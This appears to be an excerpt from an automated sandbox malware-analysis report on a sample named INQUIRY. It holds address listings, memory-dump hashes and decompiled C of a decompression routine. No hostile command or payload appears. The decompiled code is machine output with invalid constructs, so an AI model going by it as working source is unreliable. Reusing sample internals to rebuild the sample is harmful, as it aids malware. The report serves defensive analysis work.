                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00000000
                          0x0040676f
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x00000000
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x004068d2
                          0x004068d8
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00406811
                          0x00000000
                          0x00406686

                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                          • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                          • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                          • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406398() {
                          				unsigned short _t532;
                          				signed int _t533;
                          				void _t534;
                          				void* _t535;
                          				signed int _t536;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t589;
                          				signed int* _t606;
                          				void* _t613;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t613 - 0x40) != 0) {
                          						L89:
                          						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                          						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                          						L69:
                          						_t606 =  *(_t613 - 0x58);
                          						 *(_t613 - 0x84) = 0x12;
                          						L132:
                          						 *(_t613 - 0x54) = _t606;
                          						L133:
                          						_t532 =  *_t606;
                          						_t589 = _t532 & 0x0000ffff;
                          						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          						if( *(_t613 - 0xc) >= _t565) {
                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          							 *(_t613 - 0x40) = 1;
                          							_t533 = _t532 - (_t532 >> 5);
                          							 *_t606 = _t533;
                          						} else {
                          							 *(_t613 - 0x10) = _t565;
                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                          						}
                          						if( *(_t613 - 0x10) >= 0x1000000) {
                          							L139:
                          							_t534 =  *(_t613 - 0x84);
                          							L140:
                          							 *(_t613 - 0x88) = _t534;
                          							goto L1;
                          						} else {
                          							L137:
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 5;
                          								goto L170;
                          							}
                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          							goto L139;
                          						}
                          					} else {
                          						if( *(__ebp - 0x60) == 0) {
                          							L171:
                          							_t536 = _t535 | 0xffffffff;
                          							L172:
                          							return _t536;
                          						}
                          						__eax = 0;
                          						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          						0 | _t258 = _t258 + _t258 + 9;
                          						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          						L75:
                          						if( *(__ebp - 0x64) == 0) {
                          							 *(__ebp - 0x88) = 0x1b;
                          							L170:
                          							_t568 = 0x22;
                          							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                          							_t536 = 0;
                          							goto L172;
                          						}
                          						__eax =  *(__ebp - 0x14);
                          						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          						if(__eax >=  *(__ebp - 0x74)) {
                          							__eax = __eax +  *(__ebp - 0x74);
                          						}
                          						__edx =  *(__ebp - 8);
                          						__cl =  *(__eax + __edx);
                          						__eax =  *(__ebp - 0x14);
                          						 *(__ebp - 0x5c) = __cl;
                          						 *(__eax + __edx) = __cl;
                          						__eax = __eax + 1;
                          						__edx = 0;
                          						_t274 = __eax %  *(__ebp - 0x74);
                          						__eax = __eax /  *(__ebp - 0x74);
                          						__edx = _t274;
                          						__eax =  *(__ebp - 0x68);
                          						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          						_t283 = __ebp - 0x64;
                          						 *_t283 =  *(__ebp - 0x64) - 1;
                          						 *( *(__ebp - 0x68)) = __cl;
                          						L79:
                          						 *(__ebp - 0x14) = __edx;
                          						L80:
                          						 *(__ebp - 0x88) = 2;
                          					}
                          					L1:
                          					_t535 =  *(_t613 - 0x88);
                          					if(_t535 > 0x1c) {
                          						goto L171;
                          					}
                          					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
                          						case 0:
                          							if( *(_t613 - 0x6c) == 0) {
                          								goto L170;
                          							}
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							_t535 =  *( *(_t613 - 0x70));
                          							if(_t535 > 0xe1) {
                          								goto L171;
                          							}
                          							_t539 = _t535 & 0x000000ff;
                          							_push(0x2d);
                          							asm("cdq");
                          							_pop(_t570);
                          							_push(9);
                          							_pop(_t571);
                          							_t609 = _t539 / _t570;
                          							_t541 = _t539 % _t570 & 0x000000ff;
                          							asm("cdq");
                          							_t604 = _t541 % _t571 & 0x000000ff;
                          							 *(_t613 - 0x3c) = _t604;
                          							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                          							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                          							_t612 = (0x300 << _t604 + _t609) + 0x736;
                          							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                          								L10:
                          								if(_t612 == 0) {
                          									L12:
                          									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          									goto L15;
                          								} else {
                          									goto L11;
                          								}
                          								do {
                          									L11:
                          									_t612 = _t612 - 1;
                          									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                          								} while (_t612 != 0);
                          								goto L12;
                          							}
                          							if( *(_t613 - 4) != 0) {
                          								GlobalFree( *(_t613 - 4));
                          							}
                          							_t535 = GlobalAlloc(0x40, 0x600); // executed
                          							 *(_t613 - 4) = _t535;
                          							if(_t535 == 0) {
                          								goto L171;
                          							} else {
                          								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                          								goto L10;
                          							}
                          						case 1:
                          							L13:
                          							__eflags =  *(_t613 - 0x6c);
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 1;
                          								goto L170;
                          							}
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							_t45 = _t613 - 0x48;
                          							 *_t45 =  *(_t613 - 0x48) + 1;
                          							__eflags =  *_t45;
                          							L15:
                          							if( *(_t613 - 0x48) < 4) {
                          								goto L13;
                          							}
                          							_t547 =  *(_t613 - 0x40);
                          							if(_t547 ==  *(_t613 - 0x74)) {
                          								L20:
                          								 *(_t613 - 0x48) = 5;
                          								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                          								goto L23;
                          							}
                          							 *(_t613 - 0x74) = _t547;
                          							if( *(_t613 - 8) != 0) {
                          								GlobalFree( *(_t613 - 8));
                          							}
                          							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                          							 *(_t613 - 8) = _t535;
                          							if(_t535 == 0) {
                          								goto L171;
                          							} else {
                          								goto L20;
                          							}
                          						case 2:
                          							L24:
                          							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                          							 *(_t613 - 0x84) = 6;
                          							 *(_t613 - 0x4c) = _t554;
                          							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                          							goto L132;
                          						case 3:
                          							L21:
                          							__eflags =  *(_t613 - 0x6c);
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 3;
                          								goto L170;
                          							}
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							_t67 = _t613 - 0x70;
                          							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                          							__eflags =  *_t67;
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          							L23:
                          							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                          							if( *(_t613 - 0x48) != 0) {
                          								goto L21;
                          							}
                          							goto L24;
                          						case 4:
                          							goto L133;
                          						case 5:
                          							goto L137;
                          						case 6:
                          							__edx = 0;
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x34) = 1;
                          								 *(__ebp - 0x84) = 7;
                          								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          							__esi =  *(__ebp - 0x60);
                          							__cl = 8;
                          							__cl = 8 -  *(__ebp - 0x3c);
                          							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          							__ecx =  *(__ebp - 0x3c);
                          							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          							__ecx =  *(__ebp - 4);
                          							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          							__eflags =  *(__ebp - 0x38) - 4;
                          							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          							if( *(__ebp - 0x38) >= 4) {
                          								__eflags =  *(__ebp - 0x38) - 0xa;
                          								if( *(__ebp - 0x38) >= 0xa) {
                          									_t98 = __ebp - 0x38;
                          									 *_t98 =  *(__ebp - 0x38) - 6;
                          									__eflags =  *_t98;
                          								} else {
                          									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          								}
                          							} else {
                          								 *(__ebp - 0x38) = 0;
                          							}
                          							__eflags =  *(__ebp - 0x34) - __edx;
                          							if( *(__ebp - 0x34) == __edx) {
                          								__ebx = 0;
                          								__ebx = 1;
                          								goto L61;
                          							} else {
                          								__eax =  *(__ebp - 0x14);
                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          								__eflags = __eax -  *(__ebp - 0x74);
                          								if(__eax >=  *(__ebp - 0x74)) {
                          									__eax = __eax +  *(__ebp - 0x74);
                          									__eflags = __eax;
                          								}
                          								__ecx =  *(__ebp - 8);
                          								__ebx = 0;
                          								__ebx = 1;
                          								__al =  *((intOrPtr*)(__eax + __ecx));
                          								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          								goto L41;
                          							}
                          						case 7:
                          							__eflags =  *(__ebp - 0x40) - 1;
                          							if( *(__ebp - 0x40) != 1) {
                          								__eax =  *(__ebp - 0x24);
                          								 *(__ebp - 0x80) = 0x16;
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x28);
                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          								__eax =  *(__ebp - 0x2c);
                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          								__eax = 0;
                          								__eflags =  *(__ebp - 0x38) - 7;
                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          								__al = __al & 0x000000fd;
                          								__eax = (__eflags >= 0) - 1 + 0xa;
                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          								__eax =  *(__ebp - 4);
                          								__eax =  *(__ebp - 4) + 0x664;
                          								__eflags = __eax;
                          								 *(__ebp - 0x58) = __eax;
                          								goto L69;
                          							}
                          							__eax =  *(__ebp - 4);
                          							__ecx =  *(__ebp - 0x38);
                          							 *(__ebp - 0x84) = 8;
                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          							goto L132;
                          						case 8:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xa;
                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          							} else {
                          								__eax =  *(__ebp - 0x38);
                          								__ecx =  *(__ebp - 4);
                          								__eax =  *(__ebp - 0x38) + 0xf;
                          								 *(__ebp - 0x84) = 9;
                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          							}
                          							goto L132;
                          						case 9:
                          							goto L0;
                          						case 0xa:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xb;
                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x28);
                          							goto L88;
                          						case 0xb:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__ecx =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x20);
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          							} else {
                          								__eax =  *(__ebp - 0x24);
                          							}
                          							__ecx =  *(__ebp - 0x28);
                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          							L88:
                          							__ecx =  *(__ebp - 0x2c);
                          							 *(__ebp - 0x2c) = __eax;
                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          							goto L89;
                          						case 0xc:
                          							L99:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xc;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t334 = __ebp - 0x70;
                          							 *_t334 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t334;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							__eax =  *(__ebp - 0x2c);
                          							goto L101;
                          						case 0xd:
                          							L37:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xd;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t122 = __ebp - 0x70;
                          							 *_t122 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t122;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L39:
                          							__eax =  *(__ebp - 0x40);
